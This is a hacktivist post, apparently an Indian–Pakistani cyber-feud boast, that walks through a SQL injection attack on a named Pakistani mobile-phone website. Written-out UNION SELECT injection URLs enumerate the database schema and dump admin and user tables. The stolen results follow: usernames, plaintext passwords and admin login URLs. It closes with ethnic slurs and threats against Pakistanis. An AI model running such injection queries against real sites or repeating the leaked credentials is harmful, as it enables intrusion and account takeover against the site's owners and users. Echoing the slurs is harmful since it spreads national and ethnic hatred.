mail.whatmobile.com.pk How to Hack a Porkistani Website.

  ____    _____    __   _  _           _____
 |  _ \  |___ /   / _| | || |    ____ |___ /   _ __
 | | | |   |_ \  | |_  | || |_  |_  /   |_ \  | '__|
 | |_| |  ___) | |  _| |__   _|  / /   ___) | | |
 |____/  |____/  |_|      |_|   /___| |____/  |_|

_---------------------------------------------------------------_
 ---------------------------------------------------------------

# Exploit Title : mail.whatmobile.com.pk How to Hack a Porkistani Website.
# Google Dork   : Porkistan FUCKED !
# Date          : I WILL EXPLAIN LATER
# Author        : D3f4z3r
# VulnerableLINK: http://mail.whatmobile.com.pk/viewallcomments.php?id='3
# Version       : NEW GENERATION BOYZ 2012
# Tested on     : HACKERS TRACK
# CVE           : Does NOT Exists

     _    _                 _     _   _           _
    / \  | |__   ___  _   _| |_  | | | | ___  ___| |_
   / _ \ | '_ \ / _ \| | | | __| | |_| |/ _ \/ __| __|
  / ___ \| |_) | (_) | |_| | |_  |  _  | (_) \__ \ |_
 /_/   \_\_.__/ \___/ \__,_|\__| |_| |_|\___/|___/\__|
-------------------------------------------------------------


http://mail.whatmobile.com.pk/viewallcomments.php?id=-3 union all select 1,2,3,concat(version(),0x3c703e,user(),0x3c703e,database()),5,6,7,8,9 --


Version  : 5.0.92-community

User     : utopupco_aamir@localhost

Database : utopupco_wm


  ____       _                            _   _
 / ___|  ___| |__   ___ _ __ ___   __ _  | \ | | __ _ _ __ ___   ___
 \___ \ / __| '_ \ / _ \ '_ ` _ \ / _` | |  \| |/ _` | '_ ` _ \ / _ \
  ___) | (__| | | |  __/ | | | | | (_| | | |\  | (_| | | | | | |  __/
 |____/ \___|_| |_|\___|_| |_| |_|\__,_| |_| \_|\__,_|_| |_| |_|\___|
---------------------------------------------------------------------------


http://mail.whatmobile.com.pk/viewallcomments.php?id=-3 union all select 1,2,3,schema_name,5,6,7,8,9 from information_schema.schemata --

schema_name 1 : information_schema

schema_name 2 : utopupco_wm

     _       _           _       _     _             _
    / \   __| |_ __ ___ (_)_ __ (_)___| |_ _ __ __ _| |_ ___  _ __
   / _ \ / _` | '_ ` _ \| | '_ \| / __| __| '__/ _` | __/ _ \| '__|
  / ___ \ (_| | | | | | | | | | | \__ \ |_| | | (_| | |_ (_) | |
 /_/   \_\__,_|_| |_| |_|_|_| |_|_|___/\__|_|  \__,_|\__\___/|_|
---------------------------------------------------------------------

http://mail.whatmobile.com.pk/viewallcomments.php?id=-3 union all select 1,2,3,concat(username,0x3c703e,password,0x3c703e,id),5,6,7,8,9 from admin--


user name : umerkk

password  : sesame

id        : 1

http://mail.whatmobile.com.pk/login/

http://mail.whatmobile.com.pk/admin/

  _   _                 ____        _
 | | | |___  ___ _ __  |  _ \  __ _| |_ __ _ ____
 | | | / __|/ _ \ '__| | | | |/ _` | __/ _` |_  /
 | |_| \__ \  __/ |    | |_| | (_| | |_ (_| |/ /
  \___/|___/\___|_|    |____/ \__,_|\__\__,_/___|
-----------------------------------------------------

http://mail.whatmobile.com.pk/viewallcomments.php?id=-3 union all select 1,2,3,concat(id,0x3c703e,email,0x3c703e,password,0x3c703e),5,6,7,8,9 from user--


Id       : 1

Email    : aamir

Password : NoMoreBullShit81

  _____     _     _        _   _
 |_   _|_ _| |__ | | ___  | \ | | __ _ _ __ ___   ___ ____
   | |/ _` | '_ \| |/ _ \ |  \| |/ _` | '_ ` _ \ / _ \_  /
   | | (_| | |_) | |  __/ | |\  | (_| | | | | | |  __// /
   |_|\__,_|_.__/|_|\___| |_| \_|\__,_|_| |_| |_|\___/___|
--------------------------------------------------------------


http://mail.whatmobile.com.pk/viewallcomments.php?id=-3 union all select 1,2,3,table_name,5,6,7,8,9 from information_schema.tables--


CHARACTER_SETS

COLLATIONS

COLLATION_CHARACTER_SET_APPLICABILITY

COLUMNS

COLUMN_PRIVILEGES

KEY_COLUMN_USAGE

PROFILING

ROUTINES

SCHEMATA

SCHEMA_PRIVILEGES

STATISTICS

TABLES

TABLE_CONSTRAINTS

TABLE_PRIVILEGES

TRIGGERS

USER_PRIVILEGES

VIEWS

admin

albums

astracker_channel

astracker_click

astracker_search

astracker_view

bids

categories

comments

feedback

mobiles

outlets

register

used

usedm

user

   ____      _                         _   _
  / ___|___ | |_   _ _ __ ___  _ __   | \ | | __ _ _ __ ___   ___ ____
 | |   / _ \| | | | | '_ ` _ \| '_ \  |  \| |/ _` | '_ ` _ \ / _ \_  /
 | |___ (_) | | |_| | | | | | | | | | | |\  | (_| | | | | | |  __// /
  \____\___/|_|\__,_|_| |_| |_|_| |_| |_| \_|\__,_|_| |_| |_|\___/___|
----------------------------------------------------------------------------


http://mail.whatmobile.com.pk/viewallcomments.php?id=-3 union all select 1,2,3,column_name,5,6,7,8,9 from information_schema.columns--

CHARACTER_SET_NAME


DEFAULT_COLLATE_NAME


DESCRIPTION


MAXLEN


COLLATION_NAME


CHARACTER_SET_NAME


ID


IS_DEFAULT


IS_COMPILED


SORTLEN


COLLATION_NAME


CHARACTER_SET_NAME


TABLE_CATALOG


TABLE_SCHEMA


TABLE_NAME


COLUMN_NAME


ORDINAL_POSITION


COLUMN_DEFAULT


IS_NULLABLE


DATA_TYPE


CHARACTER_MAXIMUM_LENGTH


CHARACTER_OCTET_LENGTH


NUMERIC_PRECISION


NUMERIC_SCALE


CHARACTER_SET_NAME


COLLATION_NAME


COLUMN_TYPE


COLUMN_KEY


EXTRA


PRIVILEGES


COLUMN_COMMENT


GRANTEE


TABLE_CATALOG


TABLE_SCHEMA


TABLE_NAME


COLUMN_NAME


PRIVILEGE_TYPE


IS_GRANTABLE


CONSTRAINT_CATALOG


CONSTRAINT_SCHEMA


CONSTRAINT_NAME


TABLE_CATALOG


TABLE_SCHEMA


TABLE_NAME


COLUMN_NAME


ORDINAL_POSITION


POSITION_IN_UNIQUE_CONSTRAINT


REFERENCED_TABLE_SCHEMA


REFERENCED_TABLE_NAME


REFERENCED_COLUMN_NAME


QUERY_ID


SEQ


STATE


DURATION


CPU_USER


CPU_SYSTEM


CONTEXT_VOLUNTARY


CONTEXT_INVOLUNTARY


BLOCK_OPS_IN


BLOCK_OPS_OUT


MESSAGES_SENT


MESSAGES_RECEIVED


PAGE_FAULTS_MAJOR


PAGE_FAULTS_MINOR


SWAPS


SOURCE_FUNCTION


SOURCE_FILE


SOURCE_LINE


SPECIFIC_NAME


ROUTINE_CATALOG


ROUTINE_SCHEMA


ROUTINE_NAME


ROUTINE_TYPE


DTD_IDENTIFIER


ROUTINE_BODY


ROUTINE_DEFINITION


EXTERNAL_NAME


EXTERNAL_LANGUAGE


PARAMETER_STYLE


IS_DETERMINISTIC


SQL_DATA_ACCESS


SQL_PATH


SECURITY_TYPE


CREATED


LAST_ALTERED


SQL_MODE


ROUTINE_COMMENT


DEFINER


CATALOG_NAME


SCHEMA_NAME


DEFAULT_CHARACTER_SET_NAME


DEFAULT_COLLATION_NAME


SQL_PATH


GRANTEE


TABLE_CATALOG


TABLE_SCHEMA


PRIVILEGE_TYPE


IS_GRANTABLE


TABLE_CATALOG


TABLE_SCHEMA


TABLE_NAME


NON_UNIQUE


INDEX_SCHEMA


INDEX_NAME


SEQ_IN_INDEX


COLUMN_NAME


COLLATION


CARDINALITY


SUB_PART


PACKED


NULLABLE


INDEX_TYPE


COMMENT


TABLE_CATALOG


TABLE_SCHEMA


TABLE_NAME


TABLE_TYPE


ENGINE


VERSION


ROW_FORMAT


TABLE_ROWS


AVG_ROW_LENGTH


DATA_LENGTH


MAX_DATA_LENGTH


INDEX_LENGTH


DATA_FREE


AUTO_INCREMENT


CREATE_TIME


UPDATE_TIME


CHECK_TIME


TABLE_COLLATION


CHECKSUM


CREATE_OPTIONS


TABLE_COMMENT


CONSTRAINT_CATALOG


CONSTRAINT_SCHEMA


CONSTRAINT_NAME


TABLE_SCHEMA


TABLE_NAME


CONSTRAINT_TYPE


GRANTEE


TABLE_CATALOG


TABLE_SCHEMA


TABLE_NAME


PRIVILEGE_TYPE


IS_GRANTABLE


TRIGGER_CATALOG


TRIGGER_SCHEMA


TRIGGER_NAME


EVENT_MANIPULATION


EVENT_OBJECT_CATALOG


EVENT_OBJECT_SCHEMA


EVENT_OBJECT_TABLE


ACTION_ORDER


ACTION_CONDITION


ACTION_STATEMENT


ACTION_ORIENTATION


ACTION_TIMING


ACTION_REFERENCE_OLD_TABLE


ACTION_REFERENCE_NEW_TABLE


ACTION_REFERENCE_OLD_ROW


ACTION_REFERENCE_NEW_ROW


CREATED


SQL_MODE


DEFINER


GRANTEE


TABLE_CATALOG


PRIVILEGE_TYPE


IS_GRANTABLE


TABLE_CATALOG


TABLE_SCHEMA


TABLE_NAME


VIEW_DEFINITION


CHECK_OPTION


IS_UPDATABLE


DEFINER


SECURITY_TYPE


id


username


password


id


name


parent


img


tags


channelid


channel


description


ypn


clickid


ip


domain


page


ad


adformat


colorborder


colorbg


colorlink


colorurl


colortext


referrer


referrerdomain


keywords


channel


returnvisit


date


ypn


time


year


month


day


ampm


hour


adlinks


id


ip


domain


page


referrer


referrerdomain


keywords


searchterms


searchdomain


channel


date


time


year


month


day


ampm


hour


viewid


page


domain


views


returnviews


adformat


colorborder


colorbg


colorlink


colorurl


colortext


referrer


referrerdomain


keywords


channel


date


ypn


adlinks


id


user


mobile_id


price


date


id


name


img


id


name


email


comment


approved


mobile_id


date


ip


cook


id


sender_email


sender_name


ID


new


brand


model


latest


Accessories


dimension


Weight


battery


RingTone


Memory


Connectivity


DisplaySize


DisplayColour


Frequency


Browser


Internet


Entertainment


Colors


Imaging


Camera


Message


Price


PicSmall


Pic


Video


LAN


MP3


FM


MemoryCard


dualsim


smartphone


touchscreen


OSname


OS


Processor


VID


id


company


city


Address


un


password


id


name


email


mobile_no


brand


model


country


city


sell


sp


id


user


usingg


brand


model


price


sold


sold_date


condition


extended_condition


warrenty_provider


warrenty_left


color


IMEI


accessories


id


brand


model


price


city


PicSmall


Pic


condition


accessories


name


contact


email


date


id


email


password


  __  __             _          ____            _    _     _
 |  \/  |___  __ _  | |_ ___   |  _ \ ___  _ __| | ___)___| |_ __ _ _ __
 | |\/| / __|/ _` | | __/ _ \  | |_) / _ \| '__| |/ / / __| __/ _` | '_ \
 | |  | \__ \ (_| | | |_ (_) | |  __/ (_) | |  |   <| \__ \ |_ (_| | | | |
 |_|  |_|___/\__, |  \__\___/  |_|   \___/|_|  |_|\_\_|___/\__\__,_|_| |_|
             |___/
----------------------------------------------------------------------------------
"I said...",
"1000 of times..",
"The f4ckistan f4ckers never heard ! ",
"Them Destroyed my dreams",
"In a blink of an eye",
"I WARN YOU",
"DON'T TOUCH ANY INDIAN HACKER",
"DON'T CROSS OUR LINES",
"DON'T DO IT AGAIN",
"-=By D3f4z3r=-"

Copyright © 2011 D3f4z3r. All Rights Reserved.